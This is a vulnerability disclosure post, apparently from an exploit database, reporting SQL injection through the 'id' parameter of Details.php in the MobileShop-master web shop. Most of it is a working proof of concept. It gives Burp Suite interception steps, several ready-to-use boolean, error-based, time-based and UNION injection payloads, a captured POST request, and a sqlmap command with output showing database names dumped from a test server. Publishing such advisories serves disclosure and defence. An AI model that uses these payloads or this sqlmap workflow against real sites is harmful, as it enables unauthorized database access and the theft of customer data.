MobileShop master - SQL Injection Vuln.

2024.03.26
tr HAZIM ARBAŞ (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Description: The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data. ## Proof of Concept: + Go to the Login page: "http://localhost/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Change the 'id' value to any of the below payloads. + Send the request ## Payloads: + id=1' AND 9071=9071 AND 'EtdU'='EtdU + id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk + id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - + Or you can write your own payloads ## Proof of Concept Using SqlMap: + Go to the Login page: "http://localhormst/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Copy to File the request to a "sql.txt" file. + Run the following sqlmap command + sqlmap -r sql.txt -p id --dbs ``` POST /MobileShop-master/Details.php HTTP/1.1 Host: localhost Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost/MobileShop-master/MobilesList.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn Connection: close id=1 ``` + Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database. ``` sqlmap -r sql.txt -p id --dbs ``` ``` --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [04:17:04] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.12, Apache 2.4.58 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [04:17:04] [INFO] fetching database names [04:17:05] [INFO] resumed: 'information_schema' [04:17:05] [INFO] resumed: '1' [04:17:05] [INFO] resumed: '3' [04:17:05] [INFO] resumed: 'admidio' [04:17:05] [INFO] resumed: 'calender' [04:17:05] [INFO] resumed: 'corregidor' [04:17:05] [INFO] resumed: 'gym' [04:17:05] [INFO] resumed: 'joomla_db' [04:17:05] [INFO] resumed: 'linkstack' [04:17:05] [INFO] resumed: 'mobileshop' [04:17:05] [INFO] resumed: 'mysql' [04:17:05] [INFO] resumed: 'nickey' [04:17:05] [INFO] resumed: 'performance_schema' [04:17:05] [INFO] resumed: 'phpmyadmin' [04:17:05] [INFO] resumed: 'rcms' [04:17:05] [INFO] resumed: 'smith' [04:17:05] [INFO] resumed: 'telephone' [04:17:05] [INFO] resumed: 'test' [04:17:05] [INFO] resumed: 'valente' ```

References:

+
https://cwe.mitre.org/data/definitions/89.html
+
https://owasp.org/Top10/A03_2021-Injection/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top